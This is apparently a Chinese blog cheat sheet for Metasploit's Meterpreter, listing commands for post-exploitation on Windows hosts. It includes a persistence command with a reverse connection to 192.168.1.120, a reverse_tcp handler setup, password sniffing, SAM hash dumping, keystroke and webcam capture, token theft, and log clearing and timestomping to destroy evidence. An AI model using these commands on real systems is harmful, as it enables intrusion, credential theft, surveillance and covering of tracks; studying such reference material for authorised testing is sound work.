[ meterpreter详解与渗透实战 ](http://blog.csdn.net/freestyle4568world/article/details/54712901)

基本命令:

background

quit

shell

irb

client.sys.config.sysinfo()

调用windows API:client.core.use("railgun")

弹出会话窗口:client.railgun.user32.MessageBoxA(0,"hello!world",NULL,MB_OK)

防止休眠:client.railgun.kernel32.SetThreadExcutionState("ES_CONTINUOUSE | ES_STSTEM_REQUIRED")

cat c:\boot.ini

目标当前目录:getwd

本地当前目录:getlwd

edit

upload

download

search

portfwd 端口转发

ipconfig

route

ps

migrate 将回话一直到另一个进程中

execute

getpid

kill

getuid

sysinfo

shutdown

后渗透攻击:

persistence模块:

run persistence -X -i 5 -p 443 -r 192.168.1.120

-X开机启动

-i反向链接间隔时间

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set ...

exploit

metsvc模块:

run metsvc

getgui模块:

run getdui -u metasploit -p metasploit

use sniffer 嗅探密码

sniffer_interface

sniffer_start 1

sniffer_dump 1 /tmp/xxx.cap

sniffer_stop 1

run windows/gather/smart_hashdump

hashdump

内网拓展:

run get_local_subnets

background

route print

销毁证据:

clearev 删除日志

timestomp 文件修改时间

Core Commands

Command                   Description

-------                   -----------

?                         Help menu

background                Backgrounds the current session

bgkill                    Kills a background meterpreter script

bglist                    Lists running background scripts

bgrun                     Executes a meterpreter script as a background thread

channel                   Displays information or control active channels

close                     Closes a channel

disable_unicode_encoding  Disables encoding of unicode strings

enable_unicode_encoding   Enables encoding of unicode strings

exit                      Terminate the meterpreter session

get_timeouts              Get the current session timeout values

help                      Help menu

info                      Displays information about a Post module

irb                       Drop into irb scripting mode

load                      Load one or more meterpreter extensions

machine_id                Get the MSF ID of the machine attached to the session

migrate                   Migrate the server to another process

quit                      Terminate the meterpreter session

read                      Reads data from a channel

resource                  Run the commands stored in a file

run                       Executes a meterpreter script or Post module

sessions                  Quickly switch to another session

set_timeouts              Set the current session timeout values

sleep                     Force Meterpreter to go quiet, then re-establish session.

transport                 Change the current transport mechanism

use                       Deprecated alias for 'load'

uuid                      Get the UUID for the current session

write                     Writes data to a channel

Stdapi: File system Commands

Command       Description

-------       -----------

cat           Read the contents of a file to the screen

cd            Change directory

checksum      Retrieve the checksum of a file

cp            Copy source to destination

dir           List files (alias for ls)

download      Download a file or directory

edit          Edit a file

getlwd        Print local working directory

getwd         Print working directory

lcd           Change local working directory

lpwd          Print local working directory

ls            List files

mkdir         Make directory

mv            Move source to destination

pwd           Print working directory

rm            Delete the specified file

rmdir         Remove directory

search        Search for files

show_mount    List all mount points/logical drives

upload        Upload a file or directory

Stdapi: Networking Commands

Command       Description

-------       -----------

arp           Display the host ARP cache

getproxy      Display the current proxy configuration

ifconfig      Display interfaces

ipconfig      Display interfaces

netstat       Display the network connections

portfwd       Forward a local port to a remote service

resolve       Resolve a set of host names on the target

route         View and modify the routing table

Stdapi: System Commands

Command       Description

-------       -----------

clearev       Clear the event log

drop_token    Relinquishes any active impersonation token.

execute       Execute a command

getenv        Get one or more environment variable values

getpid        Get the current process identifier

getprivs      Attempt to enable all privileges available to the current process

getsid        Get the SID of the user that the server is running as

getuid        Get the user that the server is running as

kill          Terminate a process

localtime     Displays the target system's local date and time

ps            List running processes

reboot        Reboots the remote computer

reg           Modify and interact with the remote registry

rev2self      Calls RevertToSelf() on the remote machine

shell         Drop into a system command shell

shutdown      Shuts down the remote computer

steal_token   Attempts to steal an impersonation token from the target process

suspend       Suspends or resumes a list of processes

sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command        Description

-------        -----------

enumdesktops   List all accessible desktops and window stations

getdesktop     Get the current meterpreter desktop

idletime       Returns the number of seconds the remote user has been idle

keyscan_dump   Dump the keystroke buffer

keyscan_start  Start capturing keystrokes

keyscan_stop   Stop capturing keystrokes

screenshot     Grab a screenshot of the interactive desktop

setdesktop     Change the meterpreters current desktop

uictl          Control some of the user interface components

Stdapi: Webcam Commands

Command        Description

-------        -----------

record_mic     Record audio from the default microphone for X seconds

webcam_chat    Start a video chat

webcam_list    List webcams

webcam_snap    Take a snapshot from the specified webcam

webcam_stream  Play a video stream from the specified webcam

Priv: Elevate Commands

Command       Description

-------       -----------

getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

Command       Description

-------       -----------

hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands

Command       Description

-------       -----------

timestomp     Manipulate file MACE attributes

Incognito Commands

Command              Description

-------              -----------

add_group_user       Attempt to add a user to a global group with all tokens

add_localgroup_user  Attempt to add a user to a local group with all tokens

add_user             Attempt to add a user with all tokens

impersonate_token    Impersonate specified token

list_tokens          List tokens available under current user context

snarf_hashes         Snarf challenge/response hashes for every token

meterpreter命令的更多相关文章

  1. metasploit中meterpreter命令

    meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道. 常见的meterpreter命令 run scri ...

  2. Meterpreter命令详解

      0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以 ...

  3. meterpreter命令大全

    在其最基本的使用,meterpreter 是一个 Linux 终端在受害者的计算机上.这样,我们的许多基本的Linux命令可以用在meterpreter甚至是在一个窗口或其他操作系统. 这里有一些核心 ...

  4. [转]Metasploit的meterpreter黑客脚本列表

    原文地址: 摘要: Metasploit的框架是一个令人难以置信的黑客攻击和渗透测试工具,每一个黑客称职的应该是熟悉和有能力的. 在上一篇文章中,我提供了你的 meterpreter 命令列表.这些命 ...

  5. Kali linux 2016.2 的 plyload模块之meterpreter plyload详解

    不多说,直接上干货! 前期博客 Kali linux 2016.2(Rolling)中的payloads模块详解 当利用成功后尝试运行一个进程,它将在系统进程列表里显示,即使在木马中尝试执行系统命令, ...

  6. Meterpreter初探

    Meterpreter Meterpreter号称"黑客瑞士军刀",Meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷使用,攻击载荷在触发 ...

  7. Metasploit学习笔记——强大的Meterpreter

    1. Meterpreter命令详解 1.1基本命令 使用Adobe阅读器渗透攻击实战案例打开的Meterpreter会话实验,靶机是WinXP.由于所有命令与书中显示一致,截图将书中命令记录下来. ...

  8. (msf使用)msfconsole - meterpreter

    [msf] msfconsole meterpreter 对于这款强大渗透测试框架,详情介绍可看这里:metasploit 使用教程 对于msfconsole, Kali Linux 自带.只需用命令 ...

  9. Metasploit渗透测试魔鬼训练营

    首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性.以实践为导向,既详细讲解了Metasploit渗透测试的技术.流程.方法 ...

随机推荐

  1. Javaweb经典三层架构的演变

    1.Javaweb经历了三个时期 ①JSP Model1第一代 JSP Model1是JavaWeb早期的模型,它适合小型Web项目,开发成本低!Model1第一代时期,服务器端只有JSP页面,所有的 ...

  2. Gradle使用国内的maven仓库

    本文转载自:https://www.cnblogs.com/yoyotl/p/6291703.html 感谢阿里云! 找到gradle的配置文件路径,例如Windows中的路径为C:\Users\${ ...

  3. PAT 甲级 1009 Product of Polynomials (25)(25 分)(坑比较多,a可能很大,a也有可能是负数,回头再看看)

    1009 Product of Polynomials (25)(25 分) This time, you are supposed to find A*B where A and B are two ...

  4. mysql-1安装和数据库的管理

    1.安装 直接docker安装,客户端使用Navicat Premium. docker run -d --name csjmysql -p 3306:3306 -e MYSQL_ROOT_PASSW ...

  5. delete删除属性

    /* 删除实例属性 */ function MyObject() { this.name = "我是实例的name"; } var obj = new MyObject(); al ...

  6. Python中常见的数据类型总结

    Python提供多种数据类型来存放数据项集合,主要包括序列(列表list和元组tuple),映射(如字典dict),集合(set),下面对这几种一一介绍: 一 序列 1.列表list 列表是一种有序的 ...

  7. 安装配置Android开发环境SDK

    引言: 好搞事情,搞点移动端测试高大尚的东西,首先先得把环境搭建起来: 1.下载 握了个草,很多网站都直接推荐到android官网去下载,叔不知google官网早就被我大天朝给墙了,对于不喜欢FQ的天 ...

  8. email 解析 ,发送 邮件

    email 来源:https://blog.csdn.net/xyang81/article/details/7675160     详见此人其它mail 篇 参考2:http://lib.csdn. ...

  9. Python新利器之pipenv(转)

    pipenv 都包含什么? pipenv 是 Pipfile 主要倡导者.requests 作者 Kenneth Reitz 写的一个命令行工具,主要包含了Pipfile.pip.click.requ ...

  10. binary tree

    一.中序线索化 二叉树节点定义: class TreeNode { int val = 0; TreeNode left = null; TreeNode right = null; int isle ...